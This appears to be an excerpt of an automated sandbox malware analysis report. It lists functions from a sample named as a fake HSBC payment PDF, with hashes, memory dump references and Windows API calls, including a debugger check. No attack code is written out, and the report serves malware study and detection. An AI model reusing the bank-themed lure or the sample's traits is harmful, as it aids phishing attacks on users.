                                                                                                                                                    • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                                                                                    Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: CALL
                                                                                                                                                    • API String ID: 0-4196123274
                                                                                                                                                    • Opcode ID: 988d096a90f12cc4061dfc2aee605c5c715a60049277719237c80f455d37a458
                                                                                                                                                    • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                                                                                    • Opcode Fuzzy Hash: 988d096a90f12cc4061dfc2aee605c5c715a60049277719237c80f455d37a458
                                                                                                                                                    • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                                                                                    Function 02F1E8F0 Relevance: 3.3, APIs: 2, Instructions: 301COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa53ab6fccb58a38cea3d83407b422227650d67c7ebea9c164bc1db8e43f9171
                                                                                                                                                    • Instruction ID: 4d3c82b64673b691034b442580d226850ef5f5aaba5c12ca0e6634462ae360c3
                                                                                                                                                    • Opcode Fuzzy Hash: fa53ab6fccb58a38cea3d83407b422227650d67c7ebea9c164bc1db8e43f9171
                                                                                                                                                    • Instruction Fuzzy Hash: B2B1E921D0C3C19AEB26862488147677FE15FA26E8FCC478DEFD5476D2D3698508C763
                                                                                                                                                    Function 02F19594 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1a782142deb8d1b0be251c33f32ee93cce7daad71e8587f750f4b916d8cc5aaa
                                                                                                                                                    • Instruction ID: 9fb7e5478e6ebf411f601caf5b952e3b07d3e2ef2b2a837996d336269e90faf0
                                                                                                                                                    • Opcode Fuzzy Hash: 1a782142deb8d1b0be251c33f32ee93cce7daad71e8587f750f4b916d8cc5aaa
                                                                                                                                                    • Instruction Fuzzy Hash: 1551D721D0C3819AEB358E248A787767BA16F526E8FCC458AE7918A1E1C3E58408C7D3
                                                                                                                                                    Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                                    • Opcode ID: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                                                                                                                                                    • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                                                                                                                                                    • Opcode Fuzzy Hash: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                                                                                                                                                    • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                                                                                                                                                    Function 02F18199 Relevance: 3.1, APIs: 2, Instructions: 99COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 02F18199
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AuthorityCloseCountHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1604591301-0
                                                                                                                                                    • Opcode ID: 54ccfe22153496f0396d3da74a5b8bcb36d630387ae277a76e685edd1b976d4c
                                                                                                                                                    • Instruction ID: e33f2b2ff6c94b681bc8a2493e23b49ece5659c9b04a970b463f87a125bafec6
                                                                                                                                                    • Opcode Fuzzy Hash: 54ccfe22153496f0396d3da74a5b8bcb36d630387ae277a76e685edd1b976d4c
                                                                                                                                                    • Instruction Fuzzy Hash: D2213A32D082509FFE3E9A188E18F367B68AA415FCFDC45C5EB5AD61F1D320A805C652
                                                                                                                                                    Function 02F1B770 Relevance: 3.1, APIs: 2, Instructions: 91fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                    • Opcode ID: 1c70831341e7969fa04131c75bd4db623dfb82e290531eaa238467f6fc8f5fda
                                                                                                                                                    • Instruction ID: 853538f8a3266250870be95e205c53b0c341b7de192a643a4c245e78f3d18703
                                                                                                                                                    • Opcode Fuzzy Hash: 1c70831341e7969fa04131c75bd4db623dfb82e290531eaa238467f6fc8f5fda
                                                                                                                                                    • Instruction Fuzzy Hash: F0317AA1E0D384CFEB269A29C8393357F605F522DCFCA40DAD7828A1AAD7654409C762
                                                                                                                                                    Function 02F1AB2E Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 02F1ACDE
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                    • Opcode ID: 3ca7215a97f6a87129d6d3cff851e2b4ba358524abba1b47b57b227c2fa74482
                                                                                                                                                    • Instruction ID: aaeeaa1e8d9db405671045c037d77c38206fe5535df5f1736f97c1a01ea03823
                                                                                                                                                    • Opcode Fuzzy Hash: 3ca7215a97f6a87129d6d3cff851e2b4ba358524abba1b47b57b227c2fa74482
                                                                                                                                                    • Instruction Fuzzy Hash: 5721E47090F7C0AFE727C7248818B66BFA16F82299FC8C489F3994A1E2D778C504C756
                                                                                                                                                    Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00404834
                                                                                                                                                      • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                                                                                      • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                                                                                      • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                                                                                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                                                                                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                                                                                      • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                      • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                      • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                      • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1438897964-0
                                                                                                                                                    • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                    • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                                                                                    • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                                                                                    • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                                                                                    Function 00405C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                    • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                                                                                                                                                    • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                                                                                                                    • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                                                                                                                                                    Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                      • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902256705-0
                                                                                                                                                    • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                    • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                                                                                                    • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                                                                                    • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                                                                                    Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                                    • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                    • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                                                                                                                    • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                                                                                                                    • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                                                                                                                    Function 02F1AAC9 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,0000004C,?,00000000), ref: 02F1ACDE
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                    • Opcode ID: 8a7cb6ffca69da678ae10aeeb9afad1281f02b6a647afe6803645b3319d40025
                                                                                                                                                    • Instruction ID: 2c085cf11f39b8a175335fe2b0bffc1c39f59f4ee5090b3bfce1dbdd92992c2c
                                                                                                                                                    • Opcode Fuzzy Hash: 8a7cb6ffca69da678ae10aeeb9afad1281f02b6a647afe6803645b3319d40025
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF02435F4B780EFE72D46118C29E71BF61AF822E0FC84881E3478A190DB60C800C355
                                                                                                                                                    Function 02F182F4 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2ff630e43cdaf5c56dc6cd37287166a9a1d590c2ed8f2b2803ff94b0dcf5a054
                                                                                                                                                    • Instruction ID: 0b7c17b7efec615607de4f89bf5469517a150ed59c0accfb62649e206e1f4fbc
                                                                                                                                                    • Opcode Fuzzy Hash: 2ff630e43cdaf5c56dc6cd37287166a9a1d590c2ed8f2b2803ff94b0dcf5a054
                                                                                                                                                    • Instruction Fuzzy Hash: 68F08221E80BD596FE3F0A69AB087352AC46B627F8FD84B1CDB60A31F0D3419810654D
                                                                                                                                                    Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    • __lock_file.LIBCMT ref: 004253EB
                                                                                                                                                      • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                                                                                    • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                                    • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                    • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                                                                                    • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                                                                                    • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                                                                                    Function 02F1B108 Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,0000004C,?,00000000), ref: 02F1AD99
                                                                                                                                                    • WriteFile.KERNEL32 ref: 02F1B109
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                                    • Opcode ID: dafe0fb7b9a8c480bc1998f1476e414acf271f57d9c4a363682121195c796556
                                                                                                                                                    • Instruction ID: 56570733198f227465f70034bada655b210bb1bfe142c8c0fa613399060ae67d
                                                                                                                                                    • Opcode Fuzzy Hash: dafe0fb7b9a8c480bc1998f1476e414acf271f57d9c4a363682121195c796556
                                                                                                                                                    • Instruction Fuzzy Hash: 62E01275E49300EBEA258605C859D3AB769B7C56E9FC14A4DB32749680D7B590008A51
                                                                                                                                                    Function 00408061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                                                                                                                                                      • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3033907384-0
